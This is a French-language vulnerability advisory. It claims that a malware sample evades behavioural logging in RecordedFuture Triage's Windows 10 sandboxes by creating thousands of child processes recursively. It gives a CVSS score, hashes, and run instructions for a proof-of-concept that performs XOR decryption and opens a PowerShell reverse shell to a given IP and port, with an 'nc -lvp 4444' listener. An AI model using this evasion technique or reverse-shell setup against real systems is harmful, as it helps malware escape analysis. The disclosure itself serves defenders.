
Vulnérabilité Critique (9.8) - Le moteur d'analyse dynamique RecordedFuture Triage peut ne pas enregistrer les comportements malveillants lorsque les échantillons produisent un fork de processus récursif à très haut volume, entraînant des rapports comportementaux incohérents ou manquants.
Le sandbox Windows 10 build 2004 et Windows 10 LTSC 2021 de Triage de RecordedFuture contient une vulnérabilité critique dans son moteur d'analyse comportementale Windows qui permet à un échantillon de malware soumis d'éviter la détection et de provoquer un déni d'analyse. La vulnérabilité est déclenchée lorsqu'un échantillon crée récursivement un grand nombre de processus enfants, générant un volume élevé de journaux et épuisant les ressources système. En conséquence, un comportement malveillant clé, y compris l'exécution de PowerShell et l'activité de shell inversé, peut ne pas être enregistré ou signalé, induisant les analystes en erreur et compromettant l'intégrité et la disponibilité des résultats d'analyse du sandbox.
CVSS v3.1 : 9,8 (Critique)
Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
L'échantillon vathos_rev.exe (SHA256 : 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b) démontre une condition de déni d'analyse dans le moteur d'analyse comportementale Windows de Triage de RecordedFuture.
Lorsqu'il est déclenché sous les configurations Windows 10, l'échantillon crée récursivement des milliers de processus enfants, épuisant les ressources de suivi des processus et de journalisation. En conséquence, le sandbox signale un minimum de données comportementales et ne parvient pas à enregistrer les actions malveillantes clés.
win10v2004-20250610-enx64104s213s1/10vathos_rev.exewin10ltsc2021-20250619-enx64105s215s1/10vathos_rev.exeDans les deux environnements sandbox Windows 10, le déclenchement n'a pas réussi à capturer les étapes attendues d'exécution PowerShell et de shell inversé, bien que le malware exécute ces comportements sur l'hôte.
Le moteur d'analyse comportementale du sandbox est devenu saturé par la création récursive de processus, entraînant une télémétrie tronquée ou manquante.
Cela confirme une vulnérabilité de déni d'analyse : le moteur comportemental ne parvient pas à signaler l'activité malveillante en cas de récursion élevée et de volume de journaux important, entraînant des faux négatifs et une sortie médico-légale incomplète.
Référence du rapport public :
https://tria.ge/250822-qfystshk51
Il s'agit d'une vulnérabilité de déni d'analyse dans Triage de RecordedFuture qui peut empêcher le moteur d'analyse dynamique de capturer ou de rapporter l'activité comportementale. L'exploitation permet aux adversaires de contourner la détection comportementale et de produire des rapports d'analyse incomplets ou manquants.
Impacts clés :
Conséquences en aval :
vathos_rev.exe
3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4bdca2fc8f69f6493c7a9c1ce9a68b24549b4688ba4788e34bce47d91b0accc98d33dbf8d2924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b270 Ko250822-qfystshk51win10ltsc2021-20250619-enx642025-08-22 13:12 UTC2025-08-22 13:18 UTC250822-qfystshk51win10v2004-20250610-enx642025-08-22 13:12 UTC2025-08-22 13:18 UTCRemarque : Les détails de la version du moteur et de la version interne ne sont pas divulgués publiquement par RecordedFuture.
Toutes les observations sont basées sur des détonations publiques reproductibles de la plateforme Triage de RecordedFuture (soumission250822-qfystshk51).
La démo fournie reproduit la condition de déni d'analyse (DoA) en générant un volume très élevé de processus et une activité d'exécution profondément imbriquée. La démo crée de nombreux processus enfants et effectue un déchiffrement XOR multi-tours avant une étape finale de shell inversé PowerShell. Dans les images Windows 10 vulnérables de Triage, l'étape finale de la charge utile n'est pas enregistrée ou est tronquée, tandis que d'autres images (par exemple, Windows 11) capturent le comportement complet.
Comment exécuter
poc/vathos_demo.exe <IP> <PORT>
Démarrez un écouteur (par exemple, nc -lvp 4444) sur l'IP/port spécifié pour observer les tentatives de connexion. La démo crée un très grand nombre de processus et effectue un déchiffrement XOR multi-tours, aboutissant à une étape de shell inversé PowerShell. Dans les configurations Triage affectées, l'étape finale de la charge utile peut ne pas être enregistrée bien que l'échantillon l'exécute sur l'hôte.
Figure 1 - Tableau de bord d'aperçu Triage

Figure 2 - Rapport comportemental Windows 10 v2004 (télémétrie minimale / exemple DoA)

Figure 3 - Rapport comportemental Windows 10 LTSC 2021 (télémétrie minimale / exemple DoA)

Figure 4 - Exemple de processus enregistrés dans Windows 10 LTSC (nettoyé, pas tous les processus enregistrés) — journaux d'analyse → Processus
